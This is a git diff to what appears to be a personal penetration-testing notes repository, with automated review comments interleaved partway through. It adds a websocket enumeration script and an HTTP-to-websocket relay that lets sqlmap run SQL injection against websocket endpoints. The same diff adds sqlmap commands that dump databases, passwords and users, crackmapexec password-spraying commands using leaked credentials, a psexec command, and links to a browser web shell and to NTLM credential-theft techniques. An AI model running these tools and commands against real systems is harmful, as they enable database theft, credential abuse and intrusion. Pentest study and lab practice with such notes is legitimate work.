diff --git a/Enumeration/EnumScripts/websocket_enumeration.py b/Enumeration/EnumScripts/websocket_enumeration.py
new file mode 100644
index 0000000..cf705a2
--- /dev/null
+++ b/Enumeration/EnumScripts/websocket_enumeration.py
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+
+
+import sys
+import json
+import websocket
+
+URL_PATH = ""
+if len(sys.argv) > 1:
+ URL_PATH = sys.argv[1]
+ if URL_PATH.startswith('/'):
+ URL_PATH = URL_PATH[1::]
+
+WEBSOCKET_URL = f"ws://example.com:5789/{URL_PATH}"
+
+
+def on_open(web_socket):
+ request = {
+ "test": "example"
+ }
+
+ if len(sys.argv) == 4:
+ request = {
+ f"{sys.argv[2]}": f"{sys.argv[3]}"
+ }
+ print(f"Sent:\n\n{json.dumps(request)}")
+ web_socket.send(json.dumps(request))
+
+
+def on_message(web_socket, message):
+ print(f"\nReceived:\n\n{message}")
+
+
+websocket_client = websocket.WebSocketApp(
+ WEBSOCKET_URL,
+ on_open=on_open,
+ on_message=on_message
+ )
+
+websocket_client.run_forever()
diff --git a/Enumeration/SMB.md b/Enumeration/SMB.md
index 4e58f56..5937bb2 100644
--- a/Enumeration/SMB.md
+++ b/Enumeration/SMB.md
@@ -23,3 +23,22 @@ smbclient -L //$TARGET_IP/ --option='client min protocol=NT1'
 ```sh
 smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
 ```
+
+## Enumerate Domain Users
+
+List users of the domain through leaked credentials of an SMB user
+```sh
+crackmapexec smb example.com -u lowperm_user -p 'securepassword!' --users
+```
+
+Continue trying the found password on the users discovered in the step before
+```sh
+crackmapexec smb example.com -u domain_users.txt -p 'securepassword!' --continue-on-success
+```
+
+## Enumerate Writeable SMB shares
+
+List writeable SMB shares for found domain users via impacket's psexec
+```sh
+psexec.py example.com/domain.user@example.com
+```
diff --git a/Exploits/Databases/Scripts/sqlmap_websocket_server.py b/Exploits/Databases/Scripts/sqlmap_websocket_server.py
new file mode 100644
index 0000000..8dafeff
--- /dev/null
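Review bot: The argv handling in `on_open` silently falls back to the `{"test": "example"}` body whenever `len(sys.argv)` is anything other than 4, so running the script with a path and a key but no value sends the default request with no indication that the arguments were ignored. Validate up front with an `argparse` parser (a positional path plus an optional key/value pair), or at least print a usage line and `sys.exit(2)` when `len(sys.argv) not in (1, 2, 4)`. The `f"{sys.argv[2]}"` / `f"{sys.argv[3]}"` wrappers are redundant, since argv entries are already `str`. No `on_error` or `on_close` callback is registered on the `WebSocketApp`, so a refused connection or a failed handshake ends `run_forever()` without any output; `on_error=lambda ws, err: print(f"Error: {err}", file=sys.stderr)` would surface it.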
+++ b/Exploits/Databases/Scripts/sqlmap_websocket_server.py
@@ -0,0 +1,62 @@
+#!/usr/bin/env python3
+
+import sys
+from http.server import SimpleHTTPRequestHandler
+from socketserver import TCPServer
+from urllib.parse import unquote, urlparse
+from websocket import create_connection
+
+URL_PATH = ""
+if len(sys.argv) > 1:
+ URL_PATH = sys.argv[1]
+ if URL_PATH.startswith('/'):
+ URL_PATH = URL_PATH[1::]
+
+WS_SERVER = f"ws://example.com:5789/{URL_PATH}"
+
+
+def send_ws(payload):
+ ws = create_connection(WS_SERVER)
+ # res = ws.recv()
+ message = unquote(payload).replace('"', '\\"')
+ data = '{"version": "' + message + '"}'
+
+ ws.send(data)
+ res = ws.recv()
+ ws.close()
+
+ if res:
+ return res
+ return 0
+
+
+def middleware_server(host_port, content_type="text/plain"):
+
+ class CustomHandler(SimpleHTTPRequestHandler):
+ def do_GET(self) -> None:
+ self.send_response(200)
+ try:
+ payload = urlparse(self.path).query.split('=', 1)[1]
+ except IndexError:
+ payload = False
+ if payload:
+ content = send_ws(payload)
+ else:
+ content = "No payload specified"
+ self.send_header("Content-Type", content_type)
+ self.end_headers()
+ self.wfile.write(content.encode())
+
+ class _TCPServer(TCPServer):
+ allow_reuse_address = True
+
+ httpd = _TCPServer(host_port, CustomHandler)
+ httpd.serve_forever()
+
+
+print(f"Payload is sent to {WS_SERVER} via http://localhost:8081/?id=*")
+
+try:
+ middleware_server(('0.0.0.0', 8081))
+except KeyboardInterrupt:
+ pass
diff --git a/Exploits/Databases/Websocket SQLi.md b/Exploits/Databases/Websocket SQLi.md
index c81cb6f..94c637e 100644
--- a/Exploits/Databases/Websocket SQLi.md
+++ b/Exploits/Databases/Websocket SQLi.md
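Review bot: `send_ws` returns the int `0` when the websocket reply is empty, yet `do_GET` unconditionally calls `content.encode()`, so an empty reply raises `AttributeError` inside the handler after `send_response(200)` has already been written; return text instead (`return res or ""`, decoding first if `recv()` yields `bytes`, which I have not confirmed here). The socket from `create_connection` has no timeout and is left open when `send`/`recv` raises, so one stalled target blocks this single-threaded server indefinitely; pass `timeout=` and close in a `finally`. Because the status line is sent before the relay runs, a refused or timed-out websocket leaves the HTTP client with a half-written 200; do the relay first and answer `self.send_error(502, ...)` on `OSError`/`WebSocketException` (the latter imported from `websocket`). Finally, `middleware_server(('0.0.0.0', 8081))` listens on every interface while the printed hint and the accompanying notes use localhost; bind to `('127.0.0.1', 8081)` so the relay is not reachable by other hosts on the network.
```python
def send_ws(payload):
    # Relay one payload to WS_SERVER; always hand back text ("" when the reply is empty).
    ws = create_connection(WS_SERVER, timeout=10)
    # … unchanged: message/data construction …
    try:
        ws.send(data)
        res = ws.recv()
    finally:
        ws.close()
    if isinstance(res, bytes):
        res = res.decode(errors="replace")
    return res or ""


        def do_GET(self) -> None:
            # … unchanged: payload extraction …
            try:
                content = send_ws(payload) if payload else "No payload specified"
            except (OSError, WebSocketException) as exc:
                self.send_error(502, str(exc))
                return
            self.send_response(200)
            # … unchanged: Content-Type header and body write …
```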
@@ -6,6 +6,26 @@ sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs
 ```
+## Usage
+
+First, make sure ` websocket-client` is installed from PyPi.
+
+Enumerate the websocket via [the websocket enumeration script](../../Enumeration/EnumScripts).
+You may provide the URL endpoint you want to request and the key, value of the request via the arguments in the following way
+```sh
+websocket_enumeration.py /values key value
+```
+
+I modified the script rayhan0x01 provides so that an endpoint can set. [The modified script](./Scripts/sqlmap_websocket_server.py) is started in the following way
+```sh
+sqlmap_websocket_server.py /endpoint
+```
+
+Start sqlmap requesting the `sqlmap_websocket_server` on localhost port 8081
+```sh
+sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --risk 3 --level 5 --flush-session --dump --passwords --users
+```
+
+## References
+ * [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli)
diff --git a/Exploits/References.md b/Exploits/References.md
index 78a072a..0e14db4 100644
--- a/Exploits/References.md
+++ b/Exploits/References.md
@@ -62,6 +62,7 @@
 [PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git)
 [nishang](https://github.com/samratashok/nishang.git)
+[hacktricks' Places to steal ntlm creds](https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds)
 # Exploits
diff --git a/Forensics/Wireshark.md b/Forensics/Wireshark.md
index 53bca98..0abdb50 100644
--- a/Forensics/Wireshark.md
+++ b/Forensics/Wireshark.md
@@ -12,3 +12,9 @@ tshark -r keystrokes.pcapng -Y "usb.transfer_type==0x01 and frame.len==35 and! (
 python keystrokedecoder.py output.txt
 ```
+
+## Extracting Payload sent in DNS Request
+
+Search for the DNS requests containing the specific top level domain.
+```sh
+tshark -r capture.pcapng -Y 'dns && ip.dst==167.71.211.113 && (dns contains xyz)' -T fields -e dns.qry.name | awk -F '.' '{print $1}' | uniq > dns.out
+```
diff --git a/Reverse Shells/References.md b/Reverse Shells/References.md
index 465fbed..8351ae5 100644
--- a/Reverse Shells/References.md
+++ b/Reverse Shells/References.md
@@ -17,3 +17,7 @@
 [pentestmonkey's Reverse Shell Chea Sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 [Arr0way's Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
+
+## Pw0nyShell
+
+Commandline Shell Inside the Browser Window is [flozz's p0wny shell](https://github.com/flozz/p0wny-shell.git)